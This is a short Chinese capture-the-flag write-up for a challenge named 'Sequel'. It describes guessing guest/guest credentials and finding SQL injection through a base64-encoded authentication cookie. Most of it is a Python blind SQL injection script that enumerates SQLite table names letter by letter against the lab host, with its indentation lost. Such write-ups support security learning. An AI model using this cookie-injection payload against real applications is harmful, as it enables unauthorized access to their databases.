Sequel
爆破账号密码guest/guest
发现有三个都是no node for guest,感觉需要提权。
于是检查Cookie,找到了一串奇怪的Cookie:
最后发现是Cookie注入,利用盲注Cookie爆破密码。
import requests
import base64
import string
import sys
out = ""
while True:
for letter in string.printable:
tmp = out + letter
payload = r'{{"username":"\" OR EXISTS(SELECT name FROM sqlite_master WHERE name LIKE \"{}\" limit 1) OR \"","password":"guest"}}'.format(
tmp + '%')
payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
r = requests.get('http://9c61f34f-32c8-4eae-a49a-b9fa29a54546.node3.buuoj.cn/sequels',
cookies={"1337_AUTH": payload})
if "Movie" in r.text:
out = tmp
sys.stdout.write(letter)
sys.stdout.flush()
break
Last modified 8mo ago